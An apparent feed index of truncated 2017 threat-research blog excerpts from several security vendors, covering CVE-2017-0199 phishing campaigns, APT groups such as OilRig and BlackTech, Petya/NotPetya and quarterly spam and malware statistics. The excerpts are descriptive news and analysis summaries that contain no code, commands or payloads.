In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We’ll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a US-based government organization. W
Unit42
Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
blogs_unit42·2017-10-27·CVSS 8.8
[HIGH] Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We’ll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a US-based government organization. We observed a total of 43 emails with the following subject lines:
- Invention
- Invention Event
Within the 43 emails we observed, we found that three unique files were delivered, which consisted of two RTFs and a Micr
Unit42
OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
blogs_unit42·2017-10-09
OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
Unit 42’s ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East. When we first discovered the OilRig attack campaign in May 2016, we believed at the time it was a unique attack campaign likely operated by a known, existing threat group. As we have progressed in our research and uncovered additional attack phases, tooling, and infrastructure as discussed in our recent posting “Striking Oil: A Closer Look at Adversary Infrastructure”, it has become apparent that the threat group responsible for the OilRig attack campaign is likely to be a unique, previously unknown adversary. Additionally, others have been referring to the group respo
Unit42
OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
blogs_unit42·2017-10-09·CVSS 7.8
CVE-2017-0199 [HIGH] OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
## OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
Robert Falcone
Bryan Lee
Published: October 9, 2017
Malware
Threat Research
ISMAgent
ISMInjector CVE-2017-0199
OilRig
ThreeDollars
Unit 42’s ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East. When we first discovered the OilRig attack campaign in May 2016, we believed at the time it was a unique attack campaign likely operated by a known, existing threat group. As we have progressed in our research and uncovered additional attack phases, tooling, and infrastructure as discussed in our recent posting “Striking Oil: A Closer Look at Ad
Unit42
FreeMilk: A Highly Targeted Spear Phishing Campaign
blogs_unit42·2017-10-05·CVSS 7.8
CVE-2017-0199 [HIGH] FreeMilk: A Highly Targeted Spear Phishing Campaign
## FreeMilk: A Highly Targeted Spear Phishing Campaign
Juan Cortes
Esmid Idrizovic
Published: October 5, 2017
Malware
Threat Research
FreeMilk
Freenki
N1stAgent
PoohMilk
Spear Phishing
In May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world. The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution Vulnerability with carefully crafted decoy content customized for each target recipient. Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia. We believe that the threat actor hijacked an existing, legitimate in-progress conversation and posed as the legitimate senders to send mali
Unit42
FreeMilk: A Highly Targeted Spear Phishing Campaign
blogs_unit42·2017-10-05·CVSS 7.8
CVE-2017-0199 [HIGH] FreeMilk: A Highly Targeted Spear Phishing Campaign
In May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world. The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution Vulnerability with carefully crafted decoy content customized for each target recipient. Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia. We believe that the threat actor hijacked an existing, legitimate in-progress conversation and posed as the legitimate senders to send malicious spear phishing emails to the recipients as shown below in Figure 1.
Figure 1 Conversation Hijacking to Deliver Malware
Upon successful exploitation, the malicious document delivered two mal
Talos
Threat Round Up For Sept 8 - Sept 15
blogs_talos·2017-09-15·CVSS 7.8
[HIGH] Threat Round Up For Sept 8 - Sept 15
## Threat Round Up For Sept 8 - Sept 15
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 08 and September 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org,
Talos
Threat Round Up For Sept 8 - Sept 15
blogs_talos·2017-09-15·CVSS 7.8
[HIGH] Threat Round Up For Sept 8 - Sept 15
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 08 and September 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
The most prevalent threa
Trendmicro
A360 Drive Abused, Spreads Adwind, Remcos, Netwire RAT
blogs_trendmicro·2017-09-05
A360 Drive Abused, Spreads Adwind, Remcos, Netwire RAT
Malware
# A360 Drive Abused, Spreads Adwind, Remcos, Netwire RAT
We saw an attack on Autodesk® A360, comparable to the way file-sharing sites are being used to host malware. Abusing A360 as a malware delivery platform can enable attacks that are less likely to raise red flags.
By: Jaromir Horejsi
2017/09/05
Updated as of September 6, 2017, 2:39 AM PDT, to include U.K. as one of the top countries most affected by A360 Drive-hosted malware.
Cloud-based storage platforms have a history of cybercriminal abuse, from hosting malicious files and directly delivering malware to even making them part of a command-and-control (C&C) infrastructure. GitHub was misused this way when the Winnti group used it as a conduit for its C&C communications.
We saw a simil
Fortinet
PowerPoint File Armed with CVE-2017-0199 and UAC Bypass
blogs_fortinet·2017-09-01·CVSS 7.8
CVE-2017-0199 [HIGH] PowerPoint File Armed with CVE-2017-0199 and UAC Bypass
FORTIGUARD LABS THREAT RESEARCH
PowerPoint File Armed with CVE-2017-0199 and UAC Bypass
By Rommel Joven and Jasper Manuel | September 01, 2017
FortiGuard Labs recently discovered a new malicious PowerPoint file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx. Taking a look at the four slides of the PowerPoint Open XML Slide Show (PPSX) file, we can tell that it targets people from UN agencies, Foreign Ministries, International Organizations, and those who interact with international governments.
We will take a look on how opening this PowerPoint file could compromise your system.
Here’s an overview on how the attack works:
Figure 01: Flow of the attack process
CVE-2017-0199
This exploit targets a vulnerability identified as CVE-2017-0199, which was disclosed and patch
Fortinet
Deep Analysis of New Poison Ivy Variant
blogs_fortinet·2017-08-23
Deep Analysis of New Poison Ivy Variant
FORTIGUARD LABS THREAT RESEARCH
Deep Analysis of New Poison Ivy Variant
By Xiaopeng Zhang | August 23, 2017
Recently, the FortiGuard Labs research team observed that a new variant of Poison Ivy was being spread through a compromised PowerPoint file. We captured a PowerPoint file named Payment_Advice.ppsx, which is in OOXML format. Once the victim opens this file using the MS PowerPoint program, the malicious code contained in the file is executed. It downloads the Poison Ivy malware onto the victim’s computer and then launches it. In this blog, I’ll show the details of how this happens, what techniques are used by this malware, as well as what it does to the victim’s computer.
The PowerPoint Sample
Figure 1 shows a screenshot of when the ppsx file is opened.
Figure 1. Open Payment_Adv
Securelist
Spam and phishing in Q2 2017
blogs_securelist·2017-08-22
Spam and phishing in Q2 2017
Table of Contents
Spam: quarterly highlights
Delivery service Trojans
WannaCry in spam
Malware in password-protected archives and the corporate sector
Necurs botnet continues to distribute spam
Spam via legal services
Domain fraud
Statistics
Proportion of spam in email traffic
Sources of spam by country
Spam email size
Malicious attachments in email
Top 10 malware families
Countries targeted by malicious mailshots
Phishing
Geography of attacks
Organizations under attack
Rating the categories of organizations attacked by phishers
Hot topics this quarter
Airline tickets
False browser blocking
Punycode encoding
Attacks on Uber users
TOP 3 attacked organizations
Conclusion
Authors
Darya Gudkova
Maria Vergelis
Tatyana Shcherbakova
Nadezhda Demidova
## Spam: quarte
Securelist
Spam and phishing in Q2 2017
blogs_securelist·2017-08-22
Spam and phishing in Q2 2017
Table of Contents
- Spam: quarterly highlights
- Statistics
- Malicious attachments in email
- Phishing
- Conclusion
Authors
- Darya Gudkova
- Maria Vergelis
- Tatyana Shcherbakova
- Nadezhda Demidova
## Spam: quarterly highlights
### Delivery service Trojans
At the start of Q2 2017, we registered a wave of malicious mailings imitating notifications from well-known delivery services. Trojan downloaders were sent out in ZIP archives, and after being launched they downloaded other malware – Backdoor.Win32.Androm and Trojan.Win32.Kovter. The usual trick of presenting dangerous content as important delivery information was employed by the fraudsters to make recipients open the attachment. The malicious mailings targeted people from different countries and came in a variety of languages.
Securelist
IT threat evolution Q2 2017. Statistics
blogs_securelist·2017-08-15
IT threat evolution Q2 2017. Statistics
Table of Contents
Q2 figures
Mobile threats
Q2 events
SMS spam
Revamped ZTorg
Meet the new Trojan – Dvmap
WAP billing subscriptions
Mobile threat statistics
Distribution of mobile malware by type
TOP 20 mobile malware programs
The geography of mobile threats
Mobile banking Trojans
Mobile Ransomware
Vulnerable apps exploited by cybercriminals
Online threats (Web-based attacks)
Online threats in the banking sector
Geography of attacks
The TOP 10 banking malware families
Ransomware Trojans
The number of new modifications
The number of users attacked by ransomware
The geography of attacks
Top 10 countries attacked by cryptors
Top 10 most widespread cryptor families
Top 10 countries where online resources are seeded with malware
Countries where users faced the greatest
Securelist
IT threat evolution Q2 2017. Statistics
blogs_securelist·2017-08-15
IT threat evolution Q2 2017. Statistics
Table of Contents
- Q2 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
## Q2 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 342,566,061 malicious attacks from online resources located in 191 countries all over the world.
33,006,783 unique URLs were recognized as malicious by web antivirus components.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 224,675 user computers.
Crypto ransomware attacks were blocked on 246,675 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 185,801,835 unique malicious and pot
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits & Vulnerabilities
# CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malware type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu
2017/08/14
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE2017019
Talos
When combining exploits for added effect goes wrong
blogs_talos·2017-08-14·CVSS 8.8
CVE-2017-0199 [HIGH] When combining exploits for added effect goes wrong
### Introduction
Since public disclosure in April 2017, CVE-2017-0199 has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.
In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.
Analysis of the payload highlights the potential for the Ole2Link exploit to launch other do
Talos
When combining exploits for added effect goes wrong
blogs_talos·2017-08-14·CVSS 8.8
CVE-2017-0199 [HIGH] When combining exploits for added effect goes wrong
## When combining exploits for added effect goes wrong
## Introduction
Since public disclosure in April 2017, CVE-2017-0199 has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.
In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.
Analysis of the payload highlight
Securelist
APT Trends report Q2 2017
blogs_securelist·2017-08-08
APT Trends report Q2 2017
Table of Contents
- Introduction
- Russian-Speaking Actors
- English-Speaking Actors
- Korean-speaking Actors
- Middle Eastern Actors
- Chinese-Speaking Actors
- Best of the rest
- Predictions
- How to keep yourself protected
Authors
- GReAT
## Introduction
Since 2014, Kaspersky Lab’s Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first
Securelist
APT Trends report Q2 2017
blogs_securelist·2017-08-08·CVSS 7.8
[HIGH] APT Trends report Q2 2017
Table of Contents
Introduction
Russian-Speaking Actors
English-Speaking Actors
Korean-speaking Actors
Middle Eastern Actors
Chinese-Speaking Actors
Best of the rest
Predictions
How to keep yourself protected
Authors
GReAT
## Introduction
Kaspersky’s Private Threat Intelligence Portal (TIP)
In Q1 of 2017 we published our first APT Trends report, highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to
Trendmicro
Emails with Backdoor Targets Russian Businesses
blogs_trendmicro·2017-08-07
Emails with Backdoor Targets Russian Businesses
Malware
# Emails with Backdoor Targets Russian Businesses
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system
By: Lenart Bermejo, Ronnie Giagone, Rubio Wu, Fyodor Yarochkin
2017/08/07
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.
We’ve observed at
Fortinet
Incomplete Patch: More Joomla! Core XSS Vulnerabilities Are Found
blogs_fortinet·2017-07-12·CVSS 6.1
[MEDIUM] Incomplete Patch: More Joomla! Core XSS Vulnerabilities Are Found
FORTIGUARD LABS THREAT RESEARCH
Incomplete Patch: More Joomla! Core XSS Vulnerabilities Are Found
By Zhouyuan Yang | July 12, 2017
Joomla! is one of the world's most popular content management systems (CMS). It enables users to build Web sites and powerful online applications. More than 3 percent of Web sites are running Joomla!, and it accounts for more than 9 percent of CMS market share.
As of July 2017, Joomla! has been downloaded over 82 million times. Over 7,800 free and commercial extensions are available from the official Joomla! Extension Directory, and more are available from other sources.
In my last blog, I discovered 2 Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified as CVE-2017-7985 and CVE-2017-7986. After analyzing the patches for these issues,
Unit42
Paranoid PlugX
blogs_unit42·2017-06-27
Paranoid PlugX
Threat Research Center
Threat Research
Malware
## Paranoid PlugX
Tom Lancaster
Esmid Idrizovic
Published: June 27, 2017
Malware
Threat Research
Application Whitelisting Bypass
PlugX
Threat intelligence
The PlugX malware has a long and extensive history of being used in intrusions as part of targeted attacks. PlugX is still popular today and its longevity is remarkable. The malware itself is well documented, with multiple excellent papers covering most aspects of its functionality. Some of the best write-ups on the malware are cited below:
TR-12 – Analysis of a PlugX malware variant used for targeted attacks. (Circl)
Analysis of a Recent PlugX Variant - "P2P PlugX" (JPCert)
PlugX some uncovered points (Airbus)
PlugX – The Next Generation (Sophos)
Given this wealth of info
Tenable
Petya/NotPetya Ransomware Detection for the Modern Enterprise
blogs_tenable·2017-06-27
Petya/NotPetya Ransomware Detection for the Modern Enterprise
# Petya/NotPetya Ransomware Detection for the Modern Enterprise
Mehul Revankar
June 27, 2017
3 Min Read
A new version of the Petya malware is spreading globally, including the European Union, Ukraine and Russia. It has already impacted many organizations, both large and small, and has compromised systems at Ukraine’s central bank, its state telecommunications company, municipal metro, and Kiev’s Boryspil International Airport.
### Background
Petya ransomware is powered by Shadow Brokers exploits, which were leaked earlier this year. After compromising a system, the malware encrypts the data using a private key, and prevents users from accessing the system until it is restored or decrypted. The initial infection vector for this campaign appears to be a poiso
Fortinet
New Ransomworm Follows WannaCry Exploits
blogs_fortinet·2017-06-27·CVSS 7.8
[HIGH] New Ransomworm Follows WannaCry Exploits
FORTIGUARD LABS THREAT RESEARCH
New Ransomworm Follows WannaCry Exploits
By Aamir Lakhani | June 27, 2017
We are currently tracking a new ransomware variant sweeping across the globe that has the ability to modify the Master Boot Record similar to a previous attack known as Petya. Researchers are referring to it as either Petya or NotPetya as it hasn't been determined if this malware is a variant belonging to the Petya family. It is currently having an impact on a wide range of industries and organizations, including critical infrastructure such as energy, banking, and transportation systems.
This is a new generation of ransomware designed to take timely advantage of recent exploits. This malware targets a variety of attack vectors, including the same vulnerabilities that were exploited
Zscaler
Petya Ransomware Outbreak | Zscaler Security Blog
blogs_zscaler·2017-06-27
Petya Ransomware Outbreak | Zscaler Security Blog
Unit42
Paranoid PlugX
blogs_unit42·2017-06-27
Paranoid PlugX
The PlugX malware has a long and extensive history of being used in intrusions as part of targeted attacks. PlugX is still popular today and its longevity is remarkable. The malware itself is well documented, with multiple excellent papers covering most aspects of its functionality. Some of the best write-ups on the malware are cited below:
- TR-12 – Analysis of a PlugX malware variant used for targeted attacks. (Circl)
- Analysis of a Recent PlugX Variant - "P2P PlugX" (JPCert)
- PlugX some uncovered points (Airbus)
- PlugX – The Next Generation (Sophos)
Given this wealth of information in the public domain, PlugX receives a lot of attention from security vendors who put efforts into providing detection mechanisms for it. Despite this, it remains a tool of choice for many attackers toda
Tenable
Petya/NotPetya Ransomware Detection for the Modern Enterprise
blogs_tenable·2017-06-27
Petya/NotPetya Ransomware Detection for the Modern Enterprise
Checkpoint
2017-6-26 Global Cyber Attack Reports
blogs_checkpoint·2017-06-26
CVE-2017-8558 2017-6-26 Global Cyber Attack Reports
## 2017-6-26 Global Cyber Attack Reports
TOP ATTACKS AND BREACHES
Honda, the Japanese motor conglomerate, has halted car production at one of its domestic plants after finding WannaCry ransomware in its network. The affected plant produces approximately 1,000 vehicles a day. It is unknown how and when Honda's network got infected. In a related topic, WannaCry has hit 55 speed and red-light cameras in Australia after a human operator connected an infected USB device to the cameras, which apparently run
Fortinet
Security Research News in Brief - May 2017 Edition
blogs_fortinet·2017-06-22
Security Research News in Brief - May 2017 Edition
INDUSTRY TRENDS & INSIGHTS
Security Research News in Brief - May 2017 Edition
By Axelle Apvrille | June 22, 2017
Welcome back to our monthly review of some of the most interesting security research publications. This month, let's do a bit of crypto...
Past editions:
April 2017
March 2017
P. Carru, Attack TrustZone with Rowhammer
Rowhammer is an attack on DRAM that consists of repeatedly accessing given rows of the DRAM to cause random bit flips in adjacent rows.
Until now, the attack hadn't been demonstrated on ARM's TrustZone, but that is what the author implemented. He demonstrated that, using Rowhammer, it is possible to leak a private RSA key stored on TrustZone's secure side.
His attack is implemented as follows:
On the TrustZone non-secure side lies a Linux OS.
On TrustZone'
Trendmicro
The Trail of BlackTech’s Cyber Espionage Campaigns
blogs_trendmicro·2017-06-22·CVSS 9.8
[CRITICAL] The Trail of BlackTech’s Cyber Espionage Campaigns
# The Trail of BlackTech’s Cyber Espionage Campaigns
Following the activities and evolving tactics of cyberespionage group BlackTech helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear.
By: Lenart Bermejo, Razor Huang, CH Lei
2017/06/22
BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech’s campaigns are likely designed to steal their target’s technology.
Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three see
Fortinet
An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability
blogs_fortinet·2017-06-04·CVSS 7.8
CVE-2017-0199 [HIGH] An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability
FORTIGUARD LABS THREAT RESEARCH
An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability
By Wayne Chin Yick Low | June 04, 2017
FortiGuard Labs recently came across a new strain of samples exploiting the CVE-2017-0199 vulnerability. This vulnerability was fixed by Microsoft and the patch was released in April 2017. Due to its simplicity, it can be easily exploited by attackers. It has also been found in the wild by other vendors. We have also blogged about some samples recently found in a spear phishing attack.
While there are plenty of articles discussing this vulnerability, most of them are intended for technical readers and primarily focus on how to create proof-of-concept (POC) for the vulnerability. If you are looking for an easy-to-understand article, we found
Fortinet
Spear Phishing Fileless Attack with CVE-2017-0199
blogs_fortinet·2017-05-30·CVSS 7.8
CVE-2017-0199 [HIGH] Spear Phishing Fileless Attack with CVE-2017-0199
FORTIGUARD LABS THREAT RESEARCH
Spear Phishing Fileless Attack with CVE-2017-0199
By Bahare Sabouri and He Xu | May 30, 2017
Introduction
CVE-2017-0199 is a remote code execution vulnerability that exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploits this vulnerability can take control of an affected system and then install programs, view, change, or delete data, or create new accounts with full user rights.
Microsoft issued a patch for this vulnerability in April, and most security vendors have published alarms for it. Unfortunately, attacks targeting this vulnerability are still widely being used in the wild.
One of our FortiSandbox devices recently detected a suspicious RTF (Rich Text Format) file that it tagged as hig
Talos
Cisco Coverage for CVE-2017-0199
blogs_talos·2017-04-14·CVSS 7.8
CVE-2017-0199 [HIGH] Cisco Coverage for CVE-2017-0199
Over the past week, information regarding a serious zero-day vulnerability (CVE-2017-0199) in Microsoft Office was publicly disclosed. Since learning of this flaw, Talos has been actively investigating the issue. Preliminary reports indicated that this vulnerability was actively being exploited in the wild and used to compromise hosts with Dridex, a well-known banking trojan.
On Tuesday, April 11, Microsoft released a patch for CVE-2017-0199. CVE-2017-0199 is an arbitrary code execution vulnerability in Microsoft Office which manifests due to improper handling of Rich Text Format (RTF) files. Exploitation of this flaw has been observed in email-based attacks where adversaries bait users to open a specifically crafted document attached to the message. Given that this vulnerability contin
Sentinelone
CVE-2017-0199: What REAL 0-Day Vulnerability Protection Looks Like
blogs_sentinelone·2017-04-13·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: What REAL 0-Day Vulnerability Protection Looks Like
News of a Microsoft Word 0-day vulnerability spread like wildfire this week. Discovered by FireEye, the attack is executed when a user opens a Word attachment that includes a malicious OLE2 (Object Linking and Embedding) object embedded in a specially-crafted Word document, which can then spread the Dridex banking Trojan. The 0-day vulnerability, CVE-2017-0199, was patched as part of Microsoft's Patch Tuesday security updates this week.
SentinelOne customers were protected from this vulnerability even without a product update. How did we do this? In the below video demonstration, I will show how the SentinelOne Endpoint Protection Platform agent was able to detect and prevent an attack utilizing an exploit for the CVE-2017-0199 vulnerability. The version of the agent being tested was releas
Zscaler
Microsoft Office 0-Day leveraged in spam campaigns | Zscaler
blogs_zscaler·2017-04-13·CVSS 7.8
[HIGH] Microsoft Office 0-Day leveraged in spam campaigns | Zscaler
Talos
Microsoft Patch Tuesday - April 2017
blogs_talos·2017-04-12·CVSS 7.8
CVE-2017-0106 [HIGH] Microsoft Patch Tuesday - April 2017
## Microsoft Patch Tuesday - April 2017
It’s that time again! Today we bring you April’s Microsoft Patch Tuesday information. These fixed vulnerabilities affect Outlook, Edge, Internet Explorer, Hyper-V, .NET, and Scripting Engine.
## Bulletins Rated Critical
CVE-2017-0106 outlines a vulnerability in Microsoft Word. It permits the bypass of security features when document loading is done via Outlook attachments for certain crafted emails. Successful exploitation of this issue may grant an attacker remote code execution.
CVE-2017-0158 details a vulnerability caused by certain malicious HTML files with VBScript content. Successful exploitation of this issue may grant an attacker remote code execution.
CVE-2017-0160 outlines a compromised WMI server accessed over DCOM using System.Manage
Qualys
Microsoft Fixes 45 Vulnerabilities with new Security Update Guide – says goodbye to Security Bulletins
blogs_qualys·2017-04-11·CVSS 7.5
[HIGH] Microsoft Fixes 45 Vulnerabilities with new Security Update Guide – says goodbye to Security Bulletins
Today is the first month since 1998 in which Microsoft stopped releasing security bulletins with the familiar MSxx-xxx format and replaced them with the new Security Update Guide. We talked about this change earlier in a few blog posts, and finally today it's time to say goodbye to security bulletins, which essentially combined related vulnerabilities and products for ease of consumption.
In today’s release Microsoft fixed a total of 45 vulnerabilities that could lead to remote code execution, denial-of-service, elevation of privileges, security feature bypass and spoofing. Top priority goes to the Office and WordPad CVE-2017-0199 which fixed a 0-day vulnerability that is being actively exploited in the wild. Exploitation of this vulnerability requires that a user open or preview a speciall
Fortinet
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1
blogs_fortinet·2017-04-05·CVSS 7.8
CVE-2015-1641 [HIGH] In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1
FORTIGUARD LABS THREAT RESEARCH
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1
By Jasper Manuel and Artem Semenchenko | April 05, 2017
Three weeks ago, FortiGuard Labs, along with @_ddoxer (Roland de la Paz), using VirusTotal Intelligence queries, spotted a document with the politically themed file name "Senate_panel.doc". This malicious RTF file takes advantage of the vulnerability CVE-2015-1641. Upon successful exploitation, it drops malware in the %appdata%\Microsoft directory. To evade suspicion by the victim, it also drops a decoy document which shows the symbol of the Ministry of Foreign Affairs of Pakistan on the first page, but on the next pages shows an article about the Senate of Pakistan.
Decoy document
As we were unable to identify which malware family the d
Fortinet
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2
blogs_fortinet·2017-04-05·CVSS 7.8
[HIGH] In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2
FORTIGUARD LABS THREAT RESEARCH
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2
By Jasper Manuel and Artem Semenchenko | April 05, 2017
In part 1 of FortiGuard Labs' analysis of a new variant of the BADNEWS backdoor, which is actively being used in the MONSOON APT campaign, we did a deep technical analysis of what this backdoor is capable of and how the bad guys control it using the command and control server. In this part of the analysis, we will try to discover who might be behind the distribution of these files.
Who’s Behind these Malicious Files
In part 1, we discussed that the BADNEWS backdoor is being dropped by a malicious RTF exploiting CVE-2015-1641. Interestingly, these RTF exploits contain an INCLUDEPICTURE field to insert a picture into the document which point
Sentinelone
How .LINK Files Work? - Risks, Methods, and Detection
blogs_sentinelone·2017-03-30·CVSS 7.8
[HIGH] How .LINK Files Work? - Risks, Methods, and Detection
Malicious actors keep us on our toes as they move from executables (.EXE) and script files to .LNK files to sneak in their payloads. With email servers routinely configured to reject attachments with file extensions like .exe, .pif, and .com, attackers have gotten more creative with their deception techniques.
From Locky to Kovter, the most popular ransomware is getting in on the .LNK fun. After all, an attack is only as good as the size of its impact.
## What Are .LNK Files? Understanding Their State
Attackers have moved to script based droppers to bypass the restrictions on email servers by deploying Microsoft JScript (.js), VisualBasic Script (.vbs), and Microsoft Office files that use macros (.doc/.xls). Using .LNK files is a further progression of this type of evasion since trad
Fortinet
Security Research News in Brief March 2017 Edition
blogs_fortinet·2017-03-24
Security Research News in Brief March 2017 Edition
FORTIGUARD LABS THREAT RESEARCH
Security Research News in Brief March 2017 Edition
By Axelle Apvrille | March 24, 2017
This blog post is a monthly review of some of last month's most interesting security research publications. Enjoy!
Garcia et al. Hey, My Malware Knows Physics! Attacking PLCs with Physical Model Aware Rootkit, NDSS, February 2017
The researchers present a rootkit for PLCs (Programmable Logic Controllers). The rootkit sits inside the PLC's firmware. It modifies commands before they are sent out to other modules, replacing them with malicious ones. It also modifies the sensor measurements it receives, transforming them into something that looks normal so that the human operator does not notice that something is wrong.
The rootkit, which is named Harvey, is i
Fortinet
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
blogs_fortinet·2017-03-23·CVSS 8.1
CVE-2017-0104 [HIGH] iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
FORTIGUARD LABS THREAT RESEARCH
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
By Honggang Ren | March 23, 2017
Summary
In November 2016, as part of my FortiGuard research work, I discovered and reported an iSNS server memory corruption vulnerability in Microsoft Windows Server. On Patch Tuesday of March 2017, Microsoft released Security Bulletin MS17-012, which contains the fix for this vulnerability and identifies it as CVE-2017-0104.
This vulnerability could lead to remote code execution, and is rated as critical by Microsoft. The vulnerability affects Windows Server 2008, 2012, and 2016 versions. Microsoft recommends installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulne
Fortinet
Microsoft Excel Files Increasingly Used To Spread Malware
blogs_fortinet·2017-03-08
Microsoft Excel Files Increasingly Used To Spread Malware
FORTIGUARD LABS THREAT RESEARCH
Microsoft Excel Files Increasingly Used To Spread Malware
By Xiaopeng Zhang | March 08, 2017
Over the last few years we have received a number of emails with attached Word files that spread malware. Now it seems that it is becoming more and more popular to spread malware using malicious Excel files. Lately, Fortinet has collected a number of email samples with Excel files attached (.xls, .xlsm) that spread malware by executing malicious VBA (Visual Basic for Applications) code.
VBA is a programming language used by the Microsoft Office suite. Normally, VBA is used to develop programs for Excel to perform certain tasks.
I’ll use two examples to explain how Excel files can be used to spread malware.
Excel Malware Sample 1
When the infected file is opened in Exc
Fortinet
PHPMailer Powered – Use It, But Also Remember to Update It
